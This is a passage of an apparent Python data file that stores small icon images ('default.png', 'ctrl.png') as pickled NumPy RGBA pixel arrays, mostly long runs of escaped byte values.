d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x85\\x85\\x85\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x98\\x98\\x98\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6
\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x19\\x19\\x19\\xff\\xd9\\xd9\\xd9\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x91\\x91\\x91\\xff\\x0f\\x0f\\x0f\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\xb4\\xb4\\xb4\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xffZZZ\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe2\\xe2\\xe2\\xff\\xbc\\xbc\\xbc\\xff\\x9f\\x9f\\x9f\\xff\\x9f\\x9f\\x9f\\xff\\x9f\\x9f\\x9f\\xff\\xd7\\xd7\\xd7\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xffaaa\\xff\\xdc\\xdc\\xdc\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe
6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x1e\\x1e\\x1e\\xff\\x93\\x93\\x93\\xff\\xc6\\xc6\\xc6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\x1d\\x1d\\x1d\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x0e\\x0e\\x0e\\xff***\\xff+++\\xff+++\\xff\\xaf\\xaf\\xaf\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe2\\xe2\\xe2\\xff\\x10\\x10\\x10\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x9a\\x9a\\x9a\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff@@@\\xff\\xd2\\xd2\\xd2\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe6\\xe6\\xe6\\xff\\xe1\\xe1\\xe1\\xff{{{\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x9a\\x9a\\x9a\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa
9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x16\\x16\\x16\\xff\\x0c\\x0c\\x0c\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff)))\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff)))\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff\\x03\\x03\\x03\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x03\\x03\\x03\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\x88\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\x
ff)))\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff)))\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaa\\x15\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\xa6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xbd\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\x
ff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xbe\\xa9\\xa9\\xa9\\x88\\xaa\\xaa\\xaa\\x15\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00'\np13\ntp14\nb.",
'default.png': 'cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n(I0\ntp2\nS\'b\'\np3\ntp4\nRp5\n(I1\n(I16\nI16\nI4\ntp6\ncnumpy\ndtype\np7\n(S\'u1\'\np8\nI0\nI1\ntp9\nRp10\n(I3\nS\'|\'\np11\nNNNI-1\nI-1\nI0\ntp12\nbI00\nS\'\\x00\\x7f\\xa6\\x1b\\x0c\\x8a\\xad\\xdc\\r\\x91\\xb0\\xf3\\r\\x91\\xb0\\xf3\\r\\x91\\xb0\\xf4\\r\\x91\\xb1\\xf4\\r\\x90\\xb0\\xf4\\x05\\x85\\xa9\\xef\\x00\\x7f\\xa6<\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6!\\x1d\\x9c\\xb9\\xf5g\\xd9\\xf1\\xffi\\xd9\\xf3\\xffd\\xd1\\xee\\xff]\\xcb\\xeb\\xff@\\xbb\\xe3\\xff\\x16\\x9c\\xc2\\xf8\\x00\\x7f\\xa6\\xb4\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6U\\\'\\xac\\xc5\\xf9i\\xd9\\xf3\\xffc\\xd3\\xef\\xff\\\\\\xcf\\xeb\\xffP\\xc8\\xe6\\xff\\x17\\x9f\\xc4\\xfd\\x00\\x7f\\xa6\\xfc\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x02\\x83\\xa8lH\\xc5\\xdd\\xfah\\xdc\\xf3\\xffc\\xd4\\xef\\xffV\\xce\\xe9\\xffN\\xcf\\xe7\\xff&\\xaa\\xca\\xfd\\x00\\x7f\\xa6\\xff\\x03\\x81\\xc7\\x01\\x04\\x8d\\xda\\x01\\t\\x94\\xd9\\x01\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6"$\\xa9\\xc4\\xf7g\\xdf\\xf5\\xfff\\xdb\\xf3\\xffU\\xcd\\xeb\\xff\\x16\\xb3\\xda\\xff.\\xc9\\xe1\\xff(\\xb2\\xd0\\xfe\\x01\\x7f\\xa6\\xff\\x04\\x84\\xc9\\x05\\t\\x94\\xd9\\x06\\x10\\x9c\\xd7\\x01\\x16\\xa2\\xd6\\x01\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x02\\x83\\xa9\\x81T\\xd3\\xeb\\xffg\\xe5\\xf7\\xffe\\xda\\xf3\\xff!\\xaa\\xde\\xff\\x11\\x9d\\xc3\\xfe\\x11\\xba\\xd7\\xff 
\\xb9\\xd5\\xfe\\x00\\x7f\\xa6\\xff\\x16u\\x8d\\x03\\x14\\x84\\xae\\x05\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x10\\x92\\xb4\\xc0d\\xde\\xf3\\xffg\\xe5\\xf7\\xff_\\xcc\\xef\\xff\\x0e\\x9c\\xd5\\xff\\rx\\x95\\xf6\\x0e\\x89\\xab\\xf4\\x18\\xb2\\xd1\\xfc\\x00\\x7f\\xa6\\xff\\xff\\xff\\xff\\x00\\x1a~\\x91\\x01\\x1d\\xa5\\xce\\x01\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x005\\xa9\\xc3\\xefq\\xec\\xf9\\xffg\\xe5\\xf7\\xff>\\xb7\\xe8\\xff\\x14\\x96\\xc8\\xfe\\x02}\\xa3\\xb1\\x00\\x7f\\xa6Q\\x03\\x82\\xa9\\xe8\\x00\\x7f\\xa6\\xe9\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6\\x11\\x1c\\x98\\xb8\\x04%\\xb5\\xd3\\x01\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00D\\xad\\xc8\\xf3r\\xec\\xf9\\xffg\\xe5\\xf7\\xff:\\xb7\\xe8\\xff\\x19\\x90\\xc5\\xfe\\x03{\\xa0\\xa6\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6*\\x00\\x7f\\xa6*\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6\\x98\\x0f\\x8f\\xb1\\x13&\\xb5\\xd3\\x04.\\xc0\\xd1\\x01\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x19\\x93\\xb7\\xc6i\\xdf\\xf4\\xffg\\xe5\\xf7\\xffT\\xc8\\xee\\xff\\x06\\x88\\xcd\\xff\\x08g\\x85\\xf7\\x00\\x7f\\xa6\\x15\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6\\x1b\\x01\\x80\\xa7\\xeb\\x1d\\xa3\\xca\\x16#\\xb2\\xd4\\n*\\xbb\\xd2\\x04.\\xbc\\xd7\\x01\\xff\\xff\\xff\\x00\\x01\\x81\\xa7\\x88Y\\xd1\\xee\\xffg\\xe5\\xf7\\xfff\\xd9\\xf3\\xff\\\'\\xa2\\xe2\\xff\\x05e\\x99\\xf9\\x06~\\xa5\\xf3\\x01\\x81\\xa8\\x9c\\x01\\x80\\xa8\\x9f\\x04\\x85\\xad\\xef\\x08\\x8f\\xb9\\x92\\x17\\xa4\\xd6*\\x1e\\xac\\xd5\\x1a$\\xb3\\xd3\\x0c\\x19\\xa7\\xd5\\x02\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6+!\\xa3\\xc8\\xf5i\\xe0\\xf5\\xffe\\xd9\\xf3\\xff\\\\\\xca\\xee\\xff\\x1f\\x9c\\xe0\\xfa\\x03\\x84\\xca\\xd6\\x07\\x8b\\xc5\\xca\\x06\\x88\\xc1\\xb8\\x08\\x8e\\xd0l\\x0b\\x96\\xd8I\\x11\\x9e\\xd74\\x17\\xa5\\xd6 
\\xab\\xd7\\x0b\\x17\\xa2\\xdc\\x01\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x01\\x80\\xa8~?\\xb9\\xe0\\xf9h\\xda\\xf3\\xff_\\xcc\\xef\\xffV\\xc1\\xec\\xfd3\\xa7\\xe3\\xe3\\x1a\\x96\\xde\\xae\\x04\\x8b\\xdb\\x89\\x00\\x89\\xdao\\x05\\x8f\\xd9T\\x0b\\x96\\xd8<\\x11\\x9b\\xd7\\x1d\\x18\\x95\\xc9\\x0c\\x00\\x80\\xd5\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6\\x04\\x03\\x83\\xaa\\xcd5\\xa2\\xc9\\xf9[\\xc6\\xea\\xffU\\xc1\\xec\\xffH\\xb4\\xe8\\xf39\\xa8\\xe4\\xc5\\x0b\\x8f\\xdc\\x9f\\x00\\x89\\xda{\\x00\\x89\\xda_\\x07\\x87\\xc4I\\x05|\\xa5s\\x05m\\xa3\\x02\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa6\\x06\\x01\\x7f\\xa6\\x89\\x12x\\x9e\\xf63\\x88\\xae\\xfe6\\x93\\xc3\\xfe4\\x9d\\xd6\\xdf\\x08\\x82\\xc7\\xb8\\x03k\\xa2\\xab\\x04k\\x97\\xa8\\x02w\\x9e\\xeb\\x00\\x7f\\xa6j\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\x00\\x7f\\xa67\\x00~\\xa5\\x95\\x03v\\x9c\\xd4\\x03h\\x8c\\xfa\\x02i\\x8e\\xf9\\x01x\\x9f\\xcc\\x00\\x7f\\xa6\\x92\\x00\\x7f\\xa63\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\'\np13\ntp14\nb.',
'ctrl.png': "cnumpy.core.multiarray\n_reconstruct\np0\n(cnumpy\nndarray\np1\n(I0\ntp2\nS'b'\np3\ntp4\nRp5\n(I1\n(I32\nI32\nI4\ntp6\ncnumpy\ndtype\np7\n(S'u1'\np8\nI0\nI1\ntp9\nRp10\n(I3\nS'|'\np11\nNNNI-1\nI-1\nI0\ntp12\nbI00\nS'\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xad\\xad\\xad\\x19\\xa8\\xa8\\xa8\\x8d\\xa9\\xa9\\xa9\\xc1\\xa9\\xa9\\xa9\\xf1\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xf1\\xaa\\xaa\\xaa\\xc2\\xa9\\xa9\\xa9\\x8e\\xad\\xad\\xad\\x19\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xa8\\xa8\\xa8X\\xa9\\xa9\\xa9\\xed\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xed\\xa8\\xa8\\xa8X\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaaW\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa6\\xa6\\xa6\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x9a\\x9a\\x9a\\xff\\x
a6\\xa6\\xa6\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xaa\\xaa\\xaaW\\xff\\xff\\xff\\x00\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\xeb\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff)))\\xff\\x05\\x05\\x05\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x05\\x05\\x05\\xff)))\\xff\\x88\\x88\\x88\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xeb\\xaa\\xaa\\xaa\\x15\\xa9\\xa9\\xa9\\x88\\xa9\\xa9\\xa9\\xff\\xa9\\xa9\\xa9\\xff\\x88\\x88\\x88\\xff\\x03\\x03\\x03\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00\\x00\\xff\\x00\\x00